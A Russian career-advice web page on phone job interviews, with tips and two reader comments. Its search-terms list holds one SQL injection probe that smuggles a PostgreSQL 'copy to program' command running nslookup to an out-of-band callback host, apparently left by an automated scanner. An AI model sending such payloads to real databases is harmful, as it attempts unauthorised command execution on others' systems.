Последние новости
Карьера /

Телефонное собеседование

Телефонное собеседование в принципе ничем не отличается от обычного. Как правило, сначала сотрудник фирмы рассказывает немного о компании и вакантной должности, а затем просит рассказать о себе. При таком виде собеседования очень важно говорить четко и уверенно, на вопросы отвечать коротко, но раскрывая суть.
Если вы не расслышали вопроса просто попросите его повторить, а не говорите лишь бы что. Если должность требует знания иностранного языка, то специалист по подбору персонала обязательно попросит вас поговорить на английском. В таких случаях не следует отказываться и говорить, что у вас хорошие знания, но вам сейчас не удобно говорить, так как это воспринимается, как ваше не знание. Лучше говорить как умеете — если вы претендуете на такую должность вам все равно пройдется показать свои знания, но не факт что после вашего отказа продемонстрировать свои способности вас снов попросят это сделать.
Во время телефонного собеседования также могут поинтересоваться причиной вашего ухода с прошлого места работы, не обязательно рассказывает все в деталях. Достаточно будет описать ситуацию в общих чертах, а затем прямо сказать, что не вам бы не хотелось разглашать подробности по телефону.
Если ваш разговор проходить приглашением на интервью значит ваше телефонное собеседование прошло успешно. Но стоит помнить соглашаться на такой вид собеседования нужно только если вам действительно удобно разговаривать в данный момент.


У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-1322.1964.525c6.1.bxss.me
  • testing
  • телефонное собеседование сочинение
  • телефонное собеседование на английском
  • сообщение на тему телефонное собеседование
2 комментария
-Vika-KO- / 30 августа 2012 / 00:18
Действительно, телефонное собеседование по большому счету ничем не отличается от обычного, но стоит учитывать одно большое «но». Собеседник на другом конце провода вас не видит, не видит манеры поведения и вашей внешности, и первое впечатление у него складывается от тембра и ритма вашего голоса. По первым словам и звучанию вашего голоса можно определить и ваш профессиональным уровень. И не стоит также забывать, первое впечатление произведенное вами в первые минуты или даже секунды разговора трудно будет изменить в будущем.
Kh-MAGnuM / 30 августа 2012 / 17:54
Всё это описано про "нормальное" телефонное собеседование, а таких собеседований сейчас очень мало. В основном вас либо сразу же просят приехать на собеседование, либо без всяких вопросов и объяснений говорят адрес куда подъехать и какие документы при себе иметь. На ваши вопросы зачастую могут вообще ответить "Вам вообще нужна работа? Тогда приезжайте". Если происходит такой диалог, это 90% того, что работать и даже ехать на собеседование не стоит, это просто компания набирает "рабов" на адских условиях.rnPS: Убедился неоднократно на личном опыте!
имя


Популярые сообщения